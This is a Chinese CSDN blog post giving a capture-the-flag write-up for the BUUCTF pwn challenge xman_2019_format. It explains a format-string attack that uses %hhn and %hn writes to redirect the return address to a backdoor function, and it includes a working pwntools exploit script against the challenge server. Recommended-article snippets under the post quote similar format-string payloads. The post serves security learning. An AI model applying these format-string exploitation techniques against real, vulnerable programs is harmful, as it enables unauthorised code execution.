BUUCTF之“xman_2019_format”之特殊剧情:当格式化字符串遇上堆

最新推荐文章于 2024-07-17 17:20:20 发布
最新推荐文章于 2024-07-17 17:20:20 发布
阅读量478 收藏 1
点赞数
分类专栏: 二进制pwn学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/122121139
版权

本题跟之前不一样的是,不是利用格式化任意写:去修改任意地址(包括函数got.plt)
的地址从而达到“鸠占鹊巢”间接调用,这里是修改eip去执行后门函数。主要可能是存在后门函数的原因,所以修改eip指向后门函数。

分析题目得出判断:我们要修改eip指向后门函数
在这里插入图片描述
程序给了两处格式化漏洞利用的机会。
前面虽然字符串漏洞被首先输入存入的是buff指向的堆空间,但是当调用函数的时候,其作为函数的参数,充当局部变量也会被放入栈中,我们在上图中的printf函数下个断点,并查看stack:在这里插入图片描述
虽然栈随着地址空间随机化,会变,但是我们发现本题程序的架构没有那么复杂,多次执行后发现“ebp”下方的(我们需要将在此修改为后门函数地址)地址总是倒数第二位在变就是1c啊2c啊3c啊上面的,我们可以假设一种情况这里假设位3c,多次执行后,满足3c条件就可以出结果。

这里还得注意:我们利用%n去实现修改数据,得仔细思考其定义再实现利用:
%s与%n都是利用栈上存的数据当做参数,不是栈前边的地址为参数
下面结合上图解释:
这里就是利用%hhn先修改0xffffd1880xffffd13c,再看偏移18处:修改成功后:利用%18hn修改的就是bep下方的0x804864b了,观察IDA上.text发现(函数或者指令)一般都是0x8048打头所以我们利用0xffff截取后门函数后边四个字节进行修改

WP:

from pwn import*
p=remote('node4.buuoj.cn',26689)
#context.log_level='debug'

eip=0x3c
backdoor=(0x80485ab)&(0xffff)

fmt_str="%"+str(eip)+"c%10$hhn"+"|"+"%"+str(backdoor)+"c%18$hn"+"|"
p.send(fmt_str)
p.interactive()

多次执行后总会满足条件
结果:
在这里插入图片描述

Hvf0x
关注
专栏目录
上的格式化字符串漏洞
qq_36495104的博客
05-27 1131
上构造栈帧,然后将栈迁移到上, 栈帧如下 system_addr bbbb binsh_addr
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1814
目录xman_2019_format字符串位于上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format字符串位于上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
[BUUCTF-pwn]——xman_2019_format
Y_peak的博客
03-30 563
[BUUCTF-pwn]——xman_2019_format 本小白终于想明白了, 第一个写出来这道题的人, 好厉害感觉. 脑袋嗡嗡的, 这道题让我想了一个上午竟然, 果然适当睡眠有助于思考, 睡一觉就想出来了. 也看过几个题解不过,虽然解法相同,但是基本都木有将清楚, 每一步的原因是什么都木有说清楚. peak不才, 在这里试着详细说明一下, 毕竟想了一个上午的东西,还是有必要好好总结一下的 . peak小知识 ALSR : 你们肯定都知道,不就是地址随机化嘛有什么, 但是这道题如果你们不清楚具体的原理
BUUCTF axb_2019_fmt32 & fmt64
最新发布
zwb2603096342的博客
07-17 1259
格式化字符串漏洞,fmt32和fmt64位
[BUUCTF]PWN——xman_2019_format(上的fmt+爆破栈)
mcmuyanga的博客
03-22 637
xman_2019_format 例行检查,32位程序,开启了nx 检索程序里的字符串,发现了后门函数,back_doorr=0x80485AB 这题buf并不存储在栈上,而是在malloc申请的上 之后buf作为参数,进入到sub_80485C4 由于存在后门函数,可以利用格式化字符串将返回地址改为back_door 这边主要利用了%ac$bn,将长度a的数据写入偏移为b的位置。 格式化字符串漏洞,一般需要先泄露栈地址,然后计算偏移,但是这里没办法这么利用,因为这里的s存放在chunk上,不在
BUUCTF【PicoCTF_2018_echo_back】(格式化字符串)
weixin_51055545的博客
04-26 449
文章目录PicoCTF_2018_echo_back例行检查:IDA分析:exp: PicoCTF_2018_echo_back 例行检查: 开了部分relro,没开pie, IDA分析: 函数主逻辑在vul()函数中: 先打印出一句话,然后让我们输入,大小控制在0x7f,然后很明显一个格式化字符串,然后下边直接puts完后,程序结束. 程序中存在system,并且没开pie,这里我们考虑直接改got表,我选择的是改printf()_got为system_plt,下边程序直接结束了,这里我们没办法去输入
BUUCTF(pwn)jarvisoj_fm --格式化字符串漏洞
半岛铁盒的博客
08-05 418
简单的格式化字符串漏洞题目 32位,开启了canary和nx保护 知道以上条件就可以计算偏移了 得到偏移为11 from pwn import * r=remote('node3.buuoj.cn',25582) x_addr=0x804A02C payload=p32(x_addr)+"%11$n" r.sendline(payload) r.interactive() payload=p32(x_addr)+"%11$n" 因为要使x的值为4,写入的数据由%11$n前面的参数的长度决定,
CTF pwn题之格式化字符串漏洞详解
热门推荐
lifanxin的博客
03-22 1万+
FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结 概念 在遇到pwn题中格式化字符串漏洞时,我们一般会分两大步实现漏洞利用:首先构造一个payload来寻找输入字符串到栈顶指针的偏移,然后利用偏移实现对目标地址的改写。下面我将介绍pwntools中的FmtStr类如何实现偏移的求解以及对目标地址的改写。 求偏移和任意地址写 求偏移 在格式化字符串漏洞利用中,我们一般都是这样手动构造payload进行偏移求解的,如下图所示,开头输入方便定位的字符串aaaa,然后
【学习点滴】linux调试工具、cmake和网络抓包
o小菜的博客
03-23 3648
目录 gdb 多进程调试 多线程调试: gdb底层原理 Linux下查看服务器端的并发连接个数: Valgrind memcheck strace Linux下,绑定1024以下的端口需要root权限! webbench压测工具 wireshark 网络抓包记录 tcpdump traceroute iftop perf linux下各种日志 makefile...
Frida Android hook
墨鱼菜鸡
07-11 3737
From:https://eternalsakura13.com/2020/07/04/frida/ 目录 1、r0ysue 大佬 2、Frida 环境 2.1 pyenv 2.2 frida 安装 2.3 安装 objection 2.4 frida 使用 frida 帮助 和 frida-server 帮助 2.5 frida 开发...
Linux pwn入门教程(10)——针对函数重定位流程的几种攻击
xiaoi123的博客
08-27 595
作者:Tangerine@SAINTSEC 本系列的最后一篇 感谢各位看客的支持 感谢原作者的付出 一直以来都有读者向笔者咨询教程系列问题,奈何该系列并非笔者所写[笔者仅为代发]且笔者功底薄弱,故无法解答,望见谅 如有关于该系列教程的疑问建议联系论坛的原作者ID:Tangerine 0x00 got表、plt表与延迟绑定 在之前的章节中,我们无数次提到过got表和plt表这两个结构。这两...
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink)
weixin_51055545的博客
01-18 1277
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink) 例行检查 64位,保护机制全开,IDA中分析 漏洞分析 此处edit()函数中会多写入\x00字节,导致溢出一个\x00字节,存在of by null 漏洞,add()中限制了我们申请块的大小,只能申请大于0x80的块 利用思路 1.利用格式化字符串漏洞泄露出程序基地址和libc基地址 2.利用unlink,通过unlink修改chunk0的内存地址为free_hook地址,再次edit0号块,覆写为s
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 1676
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
[第五空间2019 决赛]PWN5-BUUCTF-格式化字符串
yuqie的博客
07-07 297
第一眼就看到了'system',看一下条件,这里的atoi函数指的是把字符串转换成整数,而'nptr'就是输入的'passwd',再看看另外一个'dword_804C044'表示这个'0x804C044'地址,那意思就是如果输入的'passwd'的值与'dword_804C044'相等就行了,那就改写一下'0x804C044'的值。'指向的内存位置中。这个表示从上面的文件中读取4个字节的字符,并将读取的数据存储到。有canary,栈溢出无望。数了一下,偏移量为10。
[BUUCTF]PWN——mrctf2020_easy_equation(格式化字符串
mcmuyanga的博客
01-28 1136
mrctf2020_easy_equation 附件 步骤 例行检查,64位程序,只开启了nx保护 本地试运行一下,看看大概的情况,%p,那边,明显的格式化字符串漏洞 64位ida载入 只要满足第8行的条件即可获取shell,python算一下得到结果是2 所以这题是用格式化字符串漏洞,将judge上的值修改称即可 利用过程 确定偏移量,补了一个b之后偏移是8 由于64位传参,肯定存在被/x00截断的情况,所以我动调看了一下 我们要做的是将judge里的值修改成2,一开始我是这样写的,pa
BUUCTF--pwn--[第五空间2019 决赛]PWN5【格式化字符串
qq_73149934的博客
12-10 854
BUUCTF--pwn--[第五空间2019 决赛]PWN5
xman_2019_format
qq_62887641的博客
08-28 94
思路就是利用栈上已有的数据,布下一个指向函数返回栈的指针,劫持返回栈。劫持返回栈,利用格式化字符串,改二级指针。有格式化字符串漏洞,但不能使用栈的手法。返回就是后门函数,getshell。我们输入的内容,写在chunk里。然后解释一下各链子的变化。-----劫持ebp。
XMAN := xman -prj ${PRJ_NAME}详细解释解释上述makefile
04-28
这是一个 Makefile 中的变量赋值语句,它将 xman 变量的值设置为 `${PRJ_NAME}` 变量的值,并在变量名称前添加了 `-prj` 前缀。这个 Makefile 似乎是为了某个工程项目(即 `${PRJ_NAME}`)而编写的,XMAN 变量可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值